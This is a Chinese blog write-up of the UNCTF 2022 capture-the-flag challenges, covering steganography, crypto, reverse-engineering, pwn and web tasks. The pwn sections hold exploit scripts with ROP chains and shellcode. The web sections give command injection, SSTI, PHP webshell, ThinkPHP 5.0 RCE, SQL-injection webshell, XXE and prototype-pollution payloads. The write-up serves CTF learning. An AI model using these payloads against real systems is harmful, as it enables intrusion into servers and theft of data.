2022UNctfwp
挺早之前的比赛,最近做博客想起来要把wp一起发一下。指点和好的思路希望师傅们能交流一下,顺便可以交换友链o!QAQ
MISC
magic_word
提示o宽,打开原始文件查看,将英文字符放入在线网站解密。
Unicode Steganography with Zero-Width Characters (330k.github.io)
syslog
找到密码,用密码解密压缩包,获得flag
zhiyin
查看文件结尾,找到摩斯加密,解密获得一半密码
修改zhiyin.jpg图片的bin文件,倒序获得另一半密码
with open(r"C:\Users\Sponge\Desktop\unctf\csbj\lanqiu.jpg","rb") as f:
hex_list = ("{:02X}".format(int(c)) for c in f.read())
buflist = list(hex_list)
#print(buflist)
list1=buflist[::-1]
print(list1)
fp = open(r"C:\Users\Sponge\Desktop\unctf\csbj\1.txt","w")
for i in list1:
fp.write(i)
fp.close()
# unc7f!!!
最终解开压缩包获得flag
芝麻开门
在key。txt文件最下面找到密钥,解码为key1
用密钥和图片进行lsb解密,获得flag
python lsb.py extract flag.png out.txt key1
找得到我吗
下载附件,在word文档的document.xml文件中搜索flag找到
巨鱼
查看附件图片,修改图片高度获得密码。
用binwalk分离出zip压缩包,
用“无所谓我会出手”解压获得zip内附件,看到flag。txt中是假flag,继续查看flagisnothere。zip文件.观察此zip的二进制文件,发现是zip伪加密,去除并解压文件(下图是已经破除伪加密后,懒得改了
查看里面的附件,图片是化学中的c6h6cl6,俗称666,用这个密码破解pptx文件的加密(这里不知道化学的同学可以补习一下知识,手动狗头;或者hash爆破
发现pptx文件里面没有flag,
用zip打开pptx,搜索找到flag
我小心海绝非善类
查看附件二进制,发现结尾有base64加密,解密后感觉是提示,应该是lsb隐写。常用的就是cloacked-pixel,那密码在哪里呢?
各种工具跑了一遍之后,在Basecrack里找到了一串字符
用cloacked-pixel解lsb获得密码flaginmd5
看到8f开头,再结合解密的密码,估计是md5加密的flag,尝试爆破获得flag
import hashlib
with open('out.txt','r') as fp:
out = fp.read()
for i in range(0,len(out),32):
for j in range(128):
if out[i:i+32]==hashlib.md5(chr(j).encode(encoding='utf-8')).hexdigest().upper():
print(chr(j),end='')
In_the_Morse_Garden
查看附件pdf,有隐藏字符
复制出来后获得base加密字符
UNCTF{5L6d5Y+k5q+U5Y+k546b5Y2h5be05Y2h546b5Y2h5be05Y2hIOS+neWPpOavlOWPpOeOm
+WNoeW3tOWNoSDnjpvljaHlt7TljaHkvp3lj6Tmr5Tlj6Qg5L6d5Y+k5q+U5Y+k5L6d5Y+k5q+U5Y+k5
46b5Y2h5be05Y2h546b5Y2h5be05Y2h5L6d5Y+k5q+U5Y+k546b5Y2h5be05Y2hIOS+neWPpOavlO
WPpOeOm+WNoeW3tOWNoSDnjpvljaHlt7TljaHkvp3lj6Tmr5Tlj6Qg5L6d5Y+k5q+U5Y+k5L6d5Y+k
5q+U5Y+k546b5Y2h5be05Y2h546b5Y2h5be05Y2h5L6d5Y+k5q+U5Y+k546b5Y2h5be05Y2hIOeOm
+WNoeW3tOWNoeeOm+WNoeW3tOWNoSDkvp3lj6Tmr5Tlj6TnjpvljaHlt7TljaEg546b5Y2h5be05Y
2h5L6d5Y+k5q+U5Y+k546b5Y2h5be05Y2hIOS+neWPpOavlOWPpOeOm+WNoeW3tOWNoSDkvp3
lj6Tmr5Tlj6Tkvp3lj6Tmr5Tlj6TnjpvljaHlt7TljaHnjpvljaHlt7TljaHkvp3lj6Tmr5Tlj6TnjpvljaHlt7TljaEg54
6b5Y2h5be05Y2h5L6d5Y+k5q+U5Y+k5L6d5Y+k5q+U5Y+k5L6d5Y+k5q+U5Y+kIOS+neWPpOavlOW
PpOeOm+WNoeW3tOWNoSDnjpvljaHlt7TljaHkvp3lj6Tmr5Tlj6TnjpvljaHlt7TljaEg5L6d5Y+k5q+U5Y
+k546b5Y2h5be05Y2hIOS+neWPpOavlOWPpOeOm+WNoeW3tOWNoSDkvp3lj6Tmr5Tlj6Tnjpvlja
Hlt7TljaEg5L6d5Y+k5q+U5Y+k546b5Y2h5be05Y2hIOS+neWPpOavlOWPpOeOm+WNoeW3tOWN
oSDnjpvljaHlt7TljaHkvp3lj6Tmr5Tlj6TnjpvljaHlt7TljaHkvp3lj6Tmr5Tlj6TnjpvljaHlt7TljaHnjpvljaHlt7T
ljaE=}
base64解密一下
然后把依古比古换成-,玛卡巴卡换成.,在用摩斯解密,获得flag
UNCTF{wan_an_maka_bakaaaaa! }
社什么社
打开附件,缩小仔细观察,没有头绪。结合题目社工,以及湖南的地点,猜测是湖南的景区,百度搜索找到凤凰古城,很像,尝试md5加密获得flag
UNCTF{5689b5c8228466784f773614c4f12881}(记得大写)
pwn
题目挺简单的就不演示查询保护,过程写的也会比较简单(懒死了orz
welcomeUNCTF2022
反编译后,只要输入UNCTF&2022就可以获得flag
石头剪刀布
反编译查看程序逻辑,发现考察rand函数的伪随机机制,程序设定的种子为0xA
from pwn import *
from LibcSearcher import LibcSearcher
from ctypes import *
log_level="debug"
p = remote('node.yuzhian.com.cn',37002)
context(arch='amd64',os='linux')
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
#-----------------------------------------------------------------------
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
v4 = libc.srand(0xA)
ru(b"Will you learn about something of pwn later?(y/n)\n")
sl(b"y")
recv1 = r()
print(recv1)
recv2 = r()
print(recv2)
# ******* 0. rock ********
# ******* 1. scissor ******
# ******* 2. paper ********
while b"round" in recv1 or b"round" in recv2:
test = libc.rand() % 3
choice = bytes(str((test-1)%3),encoding = "utf-8")
print(choice)
sl(choice)
recv1 = r()
print(recv1)
recv2 = r()
print(recv2)
itr()
move your heart
同样,反编译查看程序逻辑,看到要先过一个random函数
再进入back函数中,因为程序是64位的,所以可以溢出控制的仅有8字节,尝试构造migration
因为程序里面只有call system的gadget,但是没有“/bin/sh”字符串,所以在第一次写入payload的时候,我们自己添加/bin/sh的字符串
from pwn import *
from LibcSearcher import LibcSearcher
from ctypes import *
log_level="debug"
p = process("./pwn")
p = remote('node.yuzhian.com.cn',30613)
context(arch='amd64',os='linux')
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
#-----------------------------------------------------------------------
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
libc.srand(0x42)
#gdb.attach(p)
v4 = bytes(str(libc.rand()),encoding = "utf-8")
sl(v4)
ru(b"gift:")
gift = int(r()[:-1],base = 16)# - 0x8
leak("gift",gift)
read = 0x00000000004012BF
system = 0x0000000000401307
pop_rdi = 0x00000000004013d3
binsh = gift - 0x20
payload = flat(b"a"*8,pop_rdi,binsh,system,gift,read)
s(payload)
pause()
payload2 = flat(b"/bin/sh")
sl(payload2)
itr()
checkin
这题主要看整数溢出中,atoi函数的一个小漏洞绕过题目的“-”的检测。
题目要求输入的size大小<=32且不能是-开头的,但是题目只检测了输入字符串的第一位。
我们可以用空字符绕过atoi函数的检测。因为atoi是将str转化为int,但是如果是空字符就可以跳过。
这里我们看到程序里面将flag。txt中的内容,读取到了内存中的flag这个变量处,因此我们只需要调用puts函数将flag输出即可
脚本
from pwn import *
#from LibcSearcher import LibcSearcher
#from sys import argv
context(arch='amd64',os='linux',log_level='debug',endian='little') #64位架构
#-----------------------------------------------------------------------
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
p = process("./pwn")
p = remote("node.yuzhian.com.cn",34245)
#gdb.attach(p)
ru(b"name: \n")
sl(b"120")
ru(b"Please input size: \n")
s(b"\r-671231")
pause()
padding = b'a'*0x58
pop_rdi = 0x0000000000400a53
flag = 0x6010c0
puts = 0x00000000004008BB
payload = flat(padding,pop_rdi,flag,puts)
sl(payload)
itr()
int_0x80
这里就是简单的ret2shellcode的题目,需要做的就是编写可以打印的shellcode.直接给脚本好了
from pwn import *
log_level="debug"
p = process("./pwn1")
#p = remote('node.yuzhian.com.cn',36569)
context(arch='amd64',os='linux')
#-----------------------------------------------------------------------
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
shellcode = ""
shellcode += "VXWTYH39Yj3TYfi9WmWZj8TYfi9JBWAXjKTYfi9kCWAYjCTYfi93iWAZjZTYfi9430t800T810T850T880T8A0T8C0T8DjWTYfi9eRRAPZ0T800t820t84ZHszbinzshUSTo1v1RjnXZP"
print(shellcode)
ru(b"hello pwn")
sl(shellcode)
pause()
itr()
给上连接
(118条消息) 2021 天翼杯 pwn ezshell_yongbaoii的博客-CSDN博客
re
whereisyourkey
查看程序主要判断规则,进一步查看加密函数
就是简单的加减,编写脚本即可出。
v5 = [0x76,0x67,0x70,0x6B,0x63,0x6D,0x68, 0x6E,0x63,0x69]
new = [i for i in v5]
for j in range(len(new)):
if new[j] == 0x6D:
continue
if new[j] > 111:
new[j] = new[j]+3
if new[j] <=110:
new[j] = new[j]-2
for k in new:
print(chr(k))
ezzzzre
查壳后upx脱壳,查看ida,找到比较函数,知道“HELLOCTF”进行加密后就是flag,编写脚本获得flag
key = "HELLOCTF"
out = ""
for i in key:
#print(type(ord(i)))
out += chr((2* ord(i) ) - 69)
print(out)
crypto
md5_1
查看脚本,通过在线网站爆破MD5获得flag
dddd
查看附件,修改莫斯密码解密模式,获得flag
UNCTF{Y4S_TH1S_JUST_M0RSE}
caser
根据题目提示,编写换表caser,获得flag
table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
cipher2 = "dhdAOiZKiMyLYLUaJlL/HY"
#B6vAy{dhd_AOiZ_KiMyLYLUa_JlL/HY}
cipher = "B6vAy"
res = ""
for i in range(len(cipher2)):
tmp = cipher2[i]
res += table[(table.find(tmp)+19)%len(table)]
#print(tmp)
print(res)
md5_2
查看脚本,发现对md5-1类型的题目进行简单的异或运算,编写脚本获得原本数据,手动上cmd5爆破md5值获得flag
from hashlib import md5
#flag='UNCTF{%s}'%md5('x'.encode()).hexdigest()
# x不是一个字符是n个字符
res_list = ["4c614360da93c0a041b22e537de151eb"]
with open(r"out.txt",'r') as fp:
data = [key[:-1] for key in fp.readlines()]
#print(data)
for index in range(1,len(data)):
tmp = int(data[index],16) ^ int(res_list[index-1],16)
res_list.append(hex(tmp)[2:])
print(res_list)
with open(r'1.txt','w') as f:
for j in res_list:
f.write(j+"\n")
今晚吃什么
查看题目附件,将10000置换为a,00000置换为b,用培根密码解密获得flag
babyrsa
import libnum
def phase2(high_m, n, c):
R.<x> = PolynomialRing(Zmod(n), implementation='NTL')
m = high_m + x
M = m((m^6 - c).small_roots()[0])
print(libnum.n2s(int(M)))
n= 25300208242652033869357280793502260197802939233346996226883788604545558438230715925485481688339916461848731740856670110424196191302689278983802917678262166845981990182434653654812540700781253868833088711482330886156960638711299829638134615325986782943291329606045839979194068955235982564452293191151071585886524229637518411736363501546694935414687215258794960353854781449161486836502248831218800242916663993123670693362478526606712579426928338181399677807135748947635964798646637084128123883297026488246883131504115767135194084734055003319452874635426942328780711915045004051281014237034453559205703278666394594859431
e= 6
c= 15389131311613415508844800295995106612022857692638905315980807050073537858857382728502142593301948048526944852089897832340601736781274204934578234672687680891154129252310634024554953799372265540740024915758647812906647109145094613323994058214703558717685930611371268247121960817195616837374076510986260112469914106674815925870074479182677673812235207989739299394932338770220225876070379594440075936962171457771508488819923640530653348409795232033076502186643651814610524674332768511598378284643889355772457510928898105838034556943949348749710675195450422905795881113409243269822988828033666560697512875266617885514107
high_m= 11941439146252171444944646015445273361862078914338385912062672317789429687879409370001983412365416202240
phase2(high_m, n, c)
ezRSA
import libnum
from Crypto.Util.number import *
'''
p=libnum.generate_prime(256)
e=65537
m=flag
m=libnum.s2n(m)
n=p**4
phi_n=p**4-p**3
d=libnum.invmod(e,phi_n)
c=pow(m,e,n)
print ("n=",n)
print ("e=",e)
print ("c=",c)'''
n=62927872600012424750752897921698090776534304875632744929068546073325488283530025400224435562694273281157865037525456502678901681910303434689364320018805568710613581859910858077737519009451023667409223317546843268613019139524821964086036781112269486089069810631981766346242114671167202613483097500263981460561
e=65537
c=56959646997081238078544634686875547709710666590620774134883288258992627876759606112717080946141796037573409168410595417635905762691247827322319628226051756406843950023290877673732151483843276348210800329658896558968868729658727981445607937645264850938932045242425625625685274204668013600475330284378427177504
p=89065756791595323358603857939783936930073695697065732353414009005162022399741
phi_n=p**4-p**3
d=libnum.invmod(e,phi_n)
m=pow(c,d,n)
print(long_to_bytes(m))
ezxor
import Crypto.Util.strxor as xo
import libnum, codecs, numpy as np
def isChr(x):
if ord('a') <= x and x <= ord('z'): return True
if ord('A') <= x and x <= ord('Z'): return True
return False
def infer(index, pos):
if msg[index, pos] != 0:
return
msg[index, pos] = ord(' ')
for x in range(len(c)):
if x != index:
msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')
dat = []
def getSpace():
for index, x in enumerate(c):
res = [xo.strxor(x, y) for y in c if x!=y]
f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
cnt = [f(pos) for pos in range(len(x))]
for pos in range(len(x)):
dat.append((f(pos), index, pos))
c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]
msg = np.zeros([len(c), len(c[0])], dtype=int)
getSpace()
dat = sorted(dat)[::-1]
for w, index, pos in dat:
infer(index, pos)
print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))
key = xo.strxor(c[0], ''.join([chr(c) for c in msg[0]]).encode())
print(key)
s='In the flood of darkness, hop'
m=strxor(s.encode(),long_to_bytes(int('1c2063202e1e795619300e164530104516182d28020005165e01494e0d',16)))
print(m)
Multi table
from string import ascii_uppercase
base_table=['J', 'X', 'I', 'S', 'E', 'C', 'R', 'Z', 'L', 'U', 'K', 'Q', 'Y', 'F', 'N', 'V', 'T', 'P', 'O', 'G', 'A', 'H', 'D', 'W', 'M', 'B']
table={}
for i in range(26):
table[i]=ascii_uppercase[i:]+ascii_uppercase[:i]
str='SDCGWMPNVHGAXHUGERASMEZJNDBWNUZHETD'
key=[9,15,23,16]
for i in range(len(str1)):
print(base_table[table[key[i%4]].index(str[i:i+1])],end='')
babyrsa
就是简单的p高位泄露
from Crypto.Util.number import *
import gmpy2
e=0x10001
c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140
n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
p4=8183408885924573625481737168030555426876736448015512229437332241283388177166503450163622041857 #已知P的高位
pbits= 512 #P原本的位数
kbits=pbits - p4.nbits()
print (p4.nbits())
p4 = p4 << kbits
PR.<x> = PolynomialRing(Zmod(n))
f = x + p4
roots = f.small_roots(X=2^kbits,beta=0.4)
# 经过以上一些函数处理后,n和p已经被转化为10进制
if roots:
p= p4 + int(roots[0])
print ("n",n)
print ("p",p)
print ("q",n//p)
phi = (p-1) * (n//p-1)
print("phi",phi)
d=gmpy2.invert(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
web
我太喜欢bilibili大学啦
打开容器,直接搜索ctf就看到flag
我太喜欢bilibili大学啦修复版
打开容器,搜搜hint找到一个登录页面
在访问hint1页面的时候进行抓包获得hint2
解码hint2获得用户名和密码
尝试登录后看到网页源码,发现是cookie处的命令执行漏洞,修改cookie进行命令注入127.0.0.1|cat /flag
解码后获得bilibili用户网页,访问后找到flag
easy ssti
emm,ssti的模板攻击也不太会,就是网上找脚本直接尝试
{% for c in [].class.base.subclasses() %} {% if c.name == 'catch_warnings' %} {% for b in c.init.globals.values() %} {% if b.class == {}.class %} {% if 'eval' in b.keys() %} {{ b'eval' }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
尝试上面的代码的时候发现过滤了class
后面修改class类,百度,最后构造出payload
{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('env').read()")}}
ezgame
f12搜索js
看到flag,猜测是uuid格式,尝试拼接获得flag
UNCTF{c5f9a27d-6f88-49fb-a510-fe7b163f8dd3}
签到
输入学号看到flag中的一个字,尝试bp爆破获得flag(下面就不全部演示了,5555
flag{bfff6d206cbcd6ac0870a4f48c7c313b}
babyphp
查看index.php
里面的都是套路,百度就能出。注意code这个参数过滤了system,空格的一系列命令,要构造一下绕过。需要先在code里面穿上一句话木马,这样子就不会被过滤了
get: code=eval($_GET[1]);&1=system("cat /flag.txt")
post: key1=aaroZmOk&key2=aaK1STfY&a="0"
ez_upload
开启firefox代理,上传jpg木马的时候用bp修改后缀名即可
上传成功后连接查看flag
给你一刀
打开容器就知道是5.0版本的thinkphp了,网上搜rce一把梭
poc
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
修改poc,直接看到flag
payload
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=env
随便注
查看题目,尝试id传参
fuzz测试一下,发现可以用大小写绕过过滤,再用select语句写入shell
?id=-1' union Select 1,'<?php eval($_POST["a"]);?>' INTO OUTFILE '/var/www/html/shell.php'--+
连接找到flag
听说php有一个xxe
进入容器下载hint,
访问dom.php,同时百度搜索xxe漏洞,下面附上链接
[(118条消息) Vulhub] PHP环境 XML外部实体注入漏洞(XXE)_yAnd0n9的博客-CSDN博客
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe[
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<test>
<name>&xxe;</name>
</test>
添加恶意xml如上,发包后执行成功。
修改exp看到flag
302与深大
bp抓包看到302数据包
根据提示传参得到第二个hint
根据第三个提示伪造cookie的admin
搜索找到flag
UNCTF{thai_miku_micgo_qka_WEB_GOD}
ez2048
没有邀请吗怎么能玩游戏呢?md,先找邀请码有关的函数
先拿到view中存储的数据
再看程序的主要判断逻辑,编写脚本
view=['44','33','0f','50','5d','0e','3a','32','58','30','2a','1a','0d','16','12','05','02','56','00','02','00','13','00','00']
for i in range(len(view)):
view[i]=int(view[i],16)
code=[0]*24
code[1]=view[1]
code[0]=view[0]^code[1]
for i in range(1,23,2):
code[i+2]=code[i]^view[i+2]
for i in range(2,24,2):
code[i]=code[i+1]^view[i]
for i in code:
print(chr(i),end='')
运行脚本获得邀请码,填写邀请码,进行2048
接着继续分析js脚本,搜索success关键字,看到了判断游戏通关的check_success.
控制台运行下main的函数,根据词义猜测merged.value应该是通关的2048
最后获得flag
babynode
先审计代码,百度加分析代码,查看node原型污染的方法
找到了大佬的博客:(118条消息) node.js 原型污染攻击的分析与利用_whatday的博客-CSDN博客
尝试修改payload
{"__proto__":{"id":"unctf"}}
通过bp抓包加载payload成功污染
UNCTF{22ca8686bfa31a2ae5f55a7f60009e14}
